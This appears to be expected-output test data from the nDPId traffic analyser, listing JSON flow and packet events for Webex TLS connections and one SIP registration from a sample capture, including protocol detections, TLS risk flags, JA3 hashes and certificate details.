+00477{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":311,"source":"webex.pcap","alias":"nDPId-test","flow_id":21,"flow_packet_id":1,"flow_last_seen":1444570636359,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1444570636359,"pkt":"ABoRAAACABoRAAABCABFAAA86IFAAEAGnowKCAABQERpYciqAbsEZyp7AAAAAKACOQievAAAAgQFtAQCCAoATML6AAAAAAEDAwY="} +00451{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":312,"source":"webex.pcap","alias":"nDPId-test","flow_id":21,"flow_packet_id":2,"flow_last_seen":1444570636363,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1444570636363,"pkt":"ABoRAAACABoRAAABCABFAAAoAaNAABAGtX9ARGlhCggAAQG7yKr7mNWEBGcqfFAS\/\/8xvgAA"} 
+00571{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":313,"source":"webex.pcap","alias":"nDPId-test","flow_id":22,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1444570636364,"flow_last_seen":1444570636364,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1444570636364,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"64.68.105.98","src_port":37129,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00477{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":313,"source":"webex.pcap","alias":"nDPId-test","flow_id":22,"flow_packet_id":1,"flow_last_seen":1444570636364,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1444570636364,"pkt":"ABoRAAACABoRAAABCABFAAA8Y+FAAEAGIywKCAABQERpYpEJAbvtraEaAAAAAKACOQh2dQAAAgQFtAQCCAoATML7AAAAAAEDAwY="} +00451{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":314,"source":"webex.pcap","alias":"nDPId-test","flow_id":22,"flow_packet_id":2,"flow_last_seen":1444570636368,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1444570636368,"pkt":"ABoRAAACABoRAAABCABFAAAoAaRAABAGtX1ARGliCggAAQG7kQkSUl7l7a2hG1AS\/\/9pXgAA"} +00449{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":315,"source":"webex.pcap","alias":"nDPId-test","flow_id":21,"flow_packet_id":3,"flow_last_seen":1444570636368,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1444570636368,"pkt":"ABoRAAACABoRAAABCABFAAAo6IJAAEAGnp8KCAABQERpYciqAbsEZyp8+5jVhVAQOQj4tgAA"} 
+00938{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":316,"source":"webex.pcap","alias":"nDPId-test","flow_id":21,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1444570636359,"flow_last_seen":1444570636368,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":63,"flow_tot_l4_payload_len":63,"flow_avg_l4_payload_len":15,"midstream":0,"thread_ts_msec":1444570636368,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"64.68.105.97","src_port":51370,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS Version (1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}}},"confidence": {"4":"DPI"},"proto":"TLS.Webex","breed":"Acceptable","category":"VoIP"},"tls": {"version":"TLSv1","client_requested_server_name":"","ja3":"7cb93b2404a98399e9f84c74fef1fb8f","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}} +00449{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":318,"source":"webex.pcap","alias":"nDPId-test","flow_id":22,"flow_packet_id":3,"flow_last_seen":1444570636369,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1444570636369,"pkt":"ABoRAAACABoRAAABCABFAAAoY+JAAEAGIz8KCAABQERpYpEJAbvtraEbElJe5lAQOQgwVwAA"} +00938{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":319,"source":"webex.pcap","alias":"nDPId-test","flow_id":22,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1444570636364,"flow_last_seen":1444570636369,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":63,"flow_tot_l4_payload_len":63,"flow_avg_l4_payload_len":15,"midstream":0,"thread_ts_msec":1444570636369,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"64.68.105.98","src_port":37129,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS 
Version (1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}}},"confidence": {"4":"DPI"},"proto":"TLS.Webex","breed":"Acceptable","category":"VoIP"},"tls": {"version":"TLSv1","client_requested_server_name":"","ja3":"7cb93b2404a98399e9f84c74fef1fb8f","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}} +00572{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":321,"source":"webex.pcap","alias":"nDPId-test","flow_id":23,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1444570636387,"flow_last_seen":1444570636387,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1444570636387,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"64.68.105.103","src_port":41386,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00477{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":321,"source":"webex.pcap","alias":"nDPId-test","flow_id":23,"flow_packet_id":1,"flow_last_seen":1444570636387,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1444570636387,"pkt":"ABoRAAACABoRAAABCABFAAA82lhAAEAGrK8KCAABQERpZ6GqAbsG3RlZAAAAAKACOQjUWwAAAgQFtAQCCAoATMMBAAAAAAEDAwY="} +00451{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":322,"source":"webex.pcap","alias":"nDPId-test","flow_id":23,"flow_packet_id":2,"flow_last_seen":1444570636395,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1444570636395,"pkt":"ABoRAAACABoRAAABCABFAAAoAadAABAGtXVARGlnCggAAQG7oar5IuamBt0ZWlAS\/\/9YuAAA"} 
+00449{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":323,"source":"webex.pcap","alias":"nDPId-test","flow_id":23,"flow_packet_id":3,"flow_last_seen":1444570636395,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1444570636395,"pkt":"ABoRAAACABoRAAABCABFAAAo2llAAEAGrMIKCAABQERpZ6GqAbsG3Rla+SLmp1AQOQgfsQAA"} +00939{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":324,"source":"webex.pcap","alias":"nDPId-test","flow_id":23,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1444570636387,"flow_last_seen":1444570636397,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":63,"flow_tot_l4_payload_len":63,"flow_avg_l4_payload_len":15,"midstream":0,"thread_ts_msec":1444570636397,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"64.68.105.103","src_port":41386,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS Version (1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}}},"confidence": {"4":"DPI"},"proto":"TLS.Webex","breed":"Acceptable","category":"VoIP"},"tls": {"version":"TLSv1","client_requested_server_name":"","ja3":"7cb93b2404a98399e9f84c74fef1fb8f","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}} +01401{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":328,"source":"webex.pcap","alias":"nDPId-test","flow_id":14,"flow_state":"info","flow_packets_processed":8,"flow_first_seen":1444570636180,"flow_last_seen":1444570636471,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":2527,"flow_tot_l4_payload_len":3970,"flow_avg_l4_payload_len":496,"midstream":0,"thread_ts_msec":1444570636471,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"62.109.231.3","src_port":45814,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": 
{"risk":"Obsolete TLS Version (1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}},"8": {"risk":"Weak TLS Cipher","severity":"High","risk_score": {"total":250,"client":225,"server":25}}},"confidence": {"4":"DPI"},"proto":"TLS.Webex","breed":"Acceptable","category":"VoIP"},"tls": {"version":"TLSv1","client_requested_server_name":"","server_names":"*.webex.com","ja3":"7cb93b2404a98399e9f84c74fef1fb8f","ja3s":"91589ea825a2ee41810c85fab06d2ef6","unsafe_cipher":1,"cipher":"TLS_RSA_WITH_AES_256_CBC_SHA","issuerDN":"C=US, O=Symantec Corporation, OU=Symantec Trust Network, CN=Symantec Class 3 Secure Server CA - G4","subjectDN":"C=us, ST=California, L=San Jose, O=Cisco Systems, Inc., OU=CSG, CN=*.webex.com","fingerprint":"61:C9:DE:EE:FA:AE:DC:17:A0:36:B9:68:F9:17:F6:5A:90:7B:14:E1"}} +01404{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":335,"source":"webex.pcap","alias":"nDPId-test","flow_id":12,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1444570636160,"flow_last_seen":1444570636701,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":3907,"flow_tot_l4_payload_len":3970,"flow_avg_l4_payload_len":661,"midstream":0,"thread_ts_msec":1444570636701,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"209.197.222.159","src_port":47498,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS Version (1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}},"8": {"risk":"Weak TLS Cipher","severity":"High","risk_score": {"total":250,"client":225,"server":25}}},"confidence": {"4":"DPI"},"proto":"TLS.Webex","breed":"Acceptable","category":"VoIP"},"tls": {"version":"TLSv1","client_requested_server_name":"","server_names":"*.webex.com","ja3":"7cb93b2404a98399e9f84c74fef1fb8f","ja3s":"91589ea825a2ee41810c85fab06d2ef6","unsafe_cipher":1,"cipher":"TLS_RSA_WITH_AES_256_CBC_SHA","issuerDN":"C=US, O=Symantec Corporation, 
OU=Symantec Trust Network, CN=Symantec Class 3 Secure Server CA - G4","subjectDN":"C=us, ST=California, L=San Jose, O=Cisco Systems, Inc., OU=CSG, CN=*.webex.com","fingerprint":"61:C9:DE:EE:FA:AE:DC:17:A0:36:B9:68:F9:17:F6:5A:90:7B:14:E1"}} +01402{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":336,"source":"webex.pcap","alias":"nDPId-test","flow_id":15,"flow_state":"info","flow_packets_processed":8,"flow_first_seen":1444570636248,"flow_last_seen":1444570636703,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":2579,"flow_tot_l4_payload_len":4002,"flow_avg_l4_payload_len":500,"midstream":0,"thread_ts_msec":1444570636703,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"64.68.104.140","src_port":44492,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS Version (1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}},"8": {"risk":"Weak TLS Cipher","severity":"High","risk_score": {"total":250,"client":225,"server":25}}},"confidence": {"4":"DPI"},"proto":"TLS.Webex","breed":"Acceptable","category":"VoIP"},"tls": {"version":"TLSv1","client_requested_server_name":"","server_names":"*.webex.com","ja3":"7cb93b2404a98399e9f84c74fef1fb8f","ja3s":"91589ea825a2ee41810c85fab06d2ef6","unsafe_cipher":1,"cipher":"TLS_RSA_WITH_AES_256_CBC_SHA","issuerDN":"C=US, O=Symantec Corporation, OU=Symantec Trust Network, CN=Symantec Class 3 Secure Server CA - G4","subjectDN":"C=us, ST=California, L=San Jose, O=Cisco Systems, Inc., OU=CSG, CN=*.webex.com","fingerprint":"61:C9:DE:EE:FA:AE:DC:17:A0:36:B9:68:F9:17:F6:5A:90:7B:14:E1"}} 
+01401{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":341,"source":"webex.pcap","alias":"nDPId-test","flow_id":17,"flow_state":"info","flow_packets_processed":8,"flow_first_seen":1444570636255,"flow_last_seen":1444570636706,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":2920,"flow_tot_l4_payload_len":3970,"flow_avg_l4_payload_len":496,"midstream":0,"thread_ts_msec":1444570636706,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"173.243.4.76","src_port":52730,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS Version (1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}},"8": {"risk":"Weak TLS Cipher","severity":"High","risk_score": {"total":250,"client":225,"server":25}}},"confidence": {"4":"DPI"},"proto":"TLS.Webex","breed":"Acceptable","category":"VoIP"},"tls": {"version":"TLSv1","client_requested_server_name":"","server_names":"*.webex.com","ja3":"7cb93b2404a98399e9f84c74fef1fb8f","ja3s":"91589ea825a2ee41810c85fab06d2ef6","unsafe_cipher":1,"cipher":"TLS_RSA_WITH_AES_256_CBC_SHA","issuerDN":"C=US, O=Symantec Corporation, OU=Symantec Trust Network, CN=Symantec Class 3 Secure Server CA - G4","subjectDN":"C=us, ST=California, L=San Jose, O=Cisco Systems, Inc., OU=CSG, CN=*.webex.com","fingerprint":"61:C9:DE:EE:FA:AE:DC:17:A0:36:B9:68:F9:17:F6:5A:90:7B:14:E1"}} +01402{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":347,"source":"webex.pcap","alias":"nDPId-test","flow_id":13,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1444570636170,"flow_last_seen":1444570636773,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":3907,"flow_tot_l4_payload_len":3970,"flow_avg_l4_payload_len":661,"midstream":0,"thread_ts_msec":1444570636773,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"64.68.121.153","src_port":57647,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": 
{"risk":"Obsolete TLS Version (1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}},"8": {"risk":"Weak TLS Cipher","severity":"High","risk_score": {"total":250,"client":225,"server":25}}},"confidence": {"4":"DPI"},"proto":"TLS.Webex","breed":"Acceptable","category":"VoIP"},"tls": {"version":"TLSv1","client_requested_server_name":"","server_names":"*.webex.com","ja3":"7cb93b2404a98399e9f84c74fef1fb8f","ja3s":"91589ea825a2ee41810c85fab06d2ef6","unsafe_cipher":1,"cipher":"TLS_RSA_WITH_AES_256_CBC_SHA","issuerDN":"C=US, O=Symantec Corporation, OU=Symantec Trust Network, CN=Symantec Class 3 Secure Server CA - G4","subjectDN":"C=us, ST=California, L=San Jose, O=Cisco Systems, Inc., OU=CSG, CN=*.webex.com","fingerprint":"61:C9:DE:EE:FA:AE:DC:17:A0:36:B9:68:F9:17:F6:5A:90:7B:14:E1"}} +01401{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":355,"source":"webex.pcap","alias":"nDPId-test","flow_id":22,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1444570636364,"flow_last_seen":1444570636827,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":3939,"flow_tot_l4_payload_len":4002,"flow_avg_l4_payload_len":667,"midstream":0,"thread_ts_msec":1444570636827,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"64.68.105.98","src_port":37129,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS Version (1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}},"8": {"risk":"Weak TLS Cipher","severity":"High","risk_score": {"total":250,"client":225,"server":25}}},"confidence": {"4":"DPI"},"proto":"TLS.Webex","breed":"Acceptable","category":"VoIP"},"tls": {"version":"TLSv1","client_requested_server_name":"","server_names":"*.webex.com","ja3":"7cb93b2404a98399e9f84c74fef1fb8f","ja3s":"91589ea825a2ee41810c85fab06d2ef6","unsafe_cipher":1,"cipher":"TLS_RSA_WITH_AES_256_CBC_SHA","issuerDN":"C=US, O=Symantec Corporation, OU=Symantec 
Trust Network, CN=Symantec Class 3 Secure Server CA - G4","subjectDN":"C=us, ST=California, L=San Jose, O=Cisco Systems, Inc., OU=CSG, CN=*.webex.com","fingerprint":"61:C9:DE:EE:FA:AE:DC:17:A0:36:B9:68:F9:17:F6:5A:90:7B:14:E1"}} +01402{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":356,"source":"webex.pcap","alias":"nDPId-test","flow_id":23,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1444570636387,"flow_last_seen":1444570636828,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":3939,"flow_tot_l4_payload_len":4002,"flow_avg_l4_payload_len":667,"midstream":0,"thread_ts_msec":1444570636828,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"64.68.105.103","src_port":41386,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS Version (1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}},"8": {"risk":"Weak TLS Cipher","severity":"High","risk_score": {"total":250,"client":225,"server":25}}},"confidence": {"4":"DPI"},"proto":"TLS.Webex","breed":"Acceptable","category":"VoIP"},"tls": {"version":"TLSv1","client_requested_server_name":"","server_names":"*.webex.com","ja3":"7cb93b2404a98399e9f84c74fef1fb8f","ja3s":"91589ea825a2ee41810c85fab06d2ef6","unsafe_cipher":1,"cipher":"TLS_RSA_WITH_AES_256_CBC_SHA","issuerDN":"C=US, O=Symantec Corporation, OU=Symantec Trust Network, CN=Symantec Class 3 Secure Server CA - G4","subjectDN":"C=us, ST=California, L=San Jose, O=Cisco Systems, Inc., OU=CSG, CN=*.webex.com","fingerprint":"61:C9:DE:EE:FA:AE:DC:17:A0:36:B9:68:F9:17:F6:5A:90:7B:14:E1"}} 
+01401{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":357,"source":"webex.pcap","alias":"nDPId-test","flow_id":21,"flow_state":"info","flow_packets_processed":8,"flow_first_seen":1444570636359,"flow_last_seen":1444570636829,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":2579,"flow_tot_l4_payload_len":4002,"flow_avg_l4_payload_len":500,"midstream":0,"thread_ts_msec":1444570636829,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"64.68.105.97","src_port":51370,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS Version (1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}},"8": {"risk":"Weak TLS Cipher","severity":"High","risk_score": {"total":250,"client":225,"server":25}}},"confidence": {"4":"DPI"},"proto":"TLS.Webex","breed":"Acceptable","category":"VoIP"},"tls": {"version":"TLSv1","client_requested_server_name":"","server_names":"*.webex.com","ja3":"7cb93b2404a98399e9f84c74fef1fb8f","ja3s":"91589ea825a2ee41810c85fab06d2ef6","unsafe_cipher":1,"cipher":"TLS_RSA_WITH_AES_256_CBC_SHA","issuerDN":"C=US, O=Symantec Corporation, OU=Symantec Trust Network, CN=Symantec Class 3 Secure Server CA - G4","subjectDN":"C=us, ST=California, L=San Jose, O=Cisco Systems, Inc., OU=CSG, CN=*.webex.com","fingerprint":"61:C9:DE:EE:FA:AE:DC:17:A0:36:B9:68:F9:17:F6:5A:90:7B:14:E1"}} +01402{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":365,"source":"webex.pcap","alias":"nDPId-test","flow_id":18,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1444570636259,"flow_last_seen":1444570636894,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":3939,"flow_tot_l4_payload_len":4002,"flow_avg_l4_payload_len":667,"midstream":0,"thread_ts_msec":1444570636894,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"64.68.121.100","src_port":52219,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": 
{"risk":"Obsolete TLS Version (1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}},"8": {"risk":"Weak TLS Cipher","severity":"High","risk_score": {"total":250,"client":225,"server":25}}},"confidence": {"4":"DPI"},"proto":"TLS.Webex","breed":"Acceptable","category":"VoIP"},"tls": {"version":"TLSv1","client_requested_server_name":"","server_names":"*.webex.com","ja3":"7cb93b2404a98399e9f84c74fef1fb8f","ja3s":"91589ea825a2ee41810c85fab06d2ef6","unsafe_cipher":1,"cipher":"TLS_RSA_WITH_AES_256_CBC_SHA","issuerDN":"C=US, O=Symantec Corporation, OU=Symantec Trust Network, CN=Symantec Class 3 Secure Server CA - G4","subjectDN":"C=us, ST=California, L=San Jose, O=Cisco Systems, Inc., OU=CSG, CN=*.webex.com","fingerprint":"61:C9:DE:EE:FA:AE:DC:17:A0:36:B9:68:F9:17:F6:5A:90:7B:14:E1"}} +01401{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":368,"source":"webex.pcap","alias":"nDPId-test","flow_id":19,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1444570636264,"flow_last_seen":1444570636897,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":3939,"flow_tot_l4_payload_len":4002,"flow_avg_l4_payload_len":667,"midstream":0,"thread_ts_msec":1444570636897,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"64.68.121.99","src_port":55969,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS Version (1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}},"8": {"risk":"Weak TLS Cipher","severity":"High","risk_score": {"total":250,"client":225,"server":25}}},"confidence": {"4":"DPI"},"proto":"TLS.Webex","breed":"Acceptable","category":"VoIP"},"tls": {"version":"TLSv1","client_requested_server_name":"","server_names":"*.webex.com","ja3":"7cb93b2404a98399e9f84c74fef1fb8f","ja3s":"91589ea825a2ee41810c85fab06d2ef6","unsafe_cipher":1,"cipher":"TLS_RSA_WITH_AES_256_CBC_SHA","issuerDN":"C=US, O=Symantec Corporation, OU=Symantec 
Trust Network, CN=Symantec Class 3 Secure Server CA - G4","subjectDN":"C=us, ST=California, L=San Jose, O=Cisco Systems, Inc., OU=CSG, CN=*.webex.com","fingerprint":"61:C9:DE:EE:FA:AE:DC:17:A0:36:B9:68:F9:17:F6:5A:90:7B:14:E1"}} +01402{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":381,"source":"webex.pcap","alias":"nDPId-test","flow_id":11,"flow_state":"info","flow_packets_processed":8,"flow_first_seen":1444570636155,"flow_last_seen":1444570636963,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":2527,"flow_tot_l4_payload_len":3970,"flow_avg_l4_payload_len":496,"midstream":0,"thread_ts_msec":1444570636963,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"114.29.204.49","src_port":51646,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS Version (1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}},"8": {"risk":"Weak TLS Cipher","severity":"High","risk_score": {"total":250,"client":225,"server":25}}},"confidence": {"4":"DPI"},"proto":"TLS.Webex","breed":"Acceptable","category":"VoIP"},"tls": {"version":"TLSv1","client_requested_server_name":"","server_names":"*.webex.com","ja3":"7cb93b2404a98399e9f84c74fef1fb8f","ja3s":"91589ea825a2ee41810c85fab06d2ef6","unsafe_cipher":1,"cipher":"TLS_RSA_WITH_AES_256_CBC_SHA","issuerDN":"C=US, O=Symantec Corporation, OU=Symantec Trust Network, CN=Symantec Class 3 Secure Server CA - G4","subjectDN":"C=us, ST=California, L=San Jose, O=Cisco Systems, Inc., OU=CSG, CN=*.webex.com","fingerprint":"61:C9:DE:EE:FA:AE:DC:17:A0:36:B9:68:F9:17:F6:5A:90:7B:14:E1"}} 
00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":409,"source":"webex.pcap","alias":"nDPId-test","flow_id":24,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1444570637191,"flow_last_seen":1444570637191,"flow_idle_time":180000,"flow_min_l4_payload_len":656,"flow_max_l4_payload_len":656,"flow_tot_l4_payload_len":656,"flow_avg_l4_payload_len":656,"midstream":0,"thread_ts_msec":1444570637191,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"172.16.1.75","src_port":64538,"dst_port":5060,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 01312{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":409,"source":"webex.pcap","alias":"nDPId-test","flow_id":24,"flow_packet_id":1,"flow_last_seen":1444570637191,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":698,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":698,"pkt_l4_len":664,"thread_ts_msec":1444570637191,"pkt":"ABoRAAACABoRAAABCABFAAKsAABAAEARgN0KCAABrBABS\/waE8QCmKnIUkVHSVNURVIgc2lwOjE3Mi4xNi4xLjc1O3RyYW5zcG9ydD1VRFAgU0lQLzIuMA0KVmlhOiBTSVAvMi4wL1VEUCAxMC4xMzMuMjA2LjQ3OjY0NTM4O2JyYW5jaD16OWhHNGJLLTUyNDI4Ny0xLS0tM2U0Njk4NjE4Y2ZiMmI3MztycG9ydA0KTWF4LUZvcndhcmRzOiA3MA0KQ29udGFjdDogPHNpcDo0NTE5MUAxMC4xMzMuMjA2LjQ3OjY0NTM4O3JpbnN0YW5jZT03YTQ2ZjFlMTI3MDJlN2ZiO3RyYW5zcG9ydD1VRFA+DQpUbzogPHNpcDo0NTE5MUAxNzIuMTYuMS43NTt0cmFuc3BvcnQ9VURQPg0KRnJvbTogPHNpcDo0NTE5MUAxNzIuMTYuMS43NTt0cmFuc3BvcnQ9VURQPjt0YWc9ZDM4MzM3NjcNCkNhbGwtSUQ6IEtvcExUdzl4c19sRXBDdGlQYTA3YlEuLg0KQ1NlcTogNCBSRUdJU1RFUg0KRXhwaXJlczogNjANCkFsbG93OiBJTlZJVEUsIEFDSywgQ0FOQ0VMLCBCWUUsIE5PVElGWSwgUkVGRVIsIE1FU1NBR0UsIE9QVElPTlMsIElORk8sIFNVQlNDUklCRQ0KU3VwcG9ydGVkOiByZXBsYWNlcywgbm9yZWZlcnN1YiwgZXh0ZW5kZWQtcmVmZXIsIHRpbWVyLCBvdXRib3VuZCwgcGF0aCwgWC1jaXNjby1zZXJ2aWNldXJpDQpVc2VyLUFnZW50OiBab2lwZXIgcjMzNjg4DQpBbGxvdy1FdmVudHM6IHByZXNlbmNlLCBrcG1sDQpDb250ZW50LUxlbmd0aDogMA0KDQo="} 
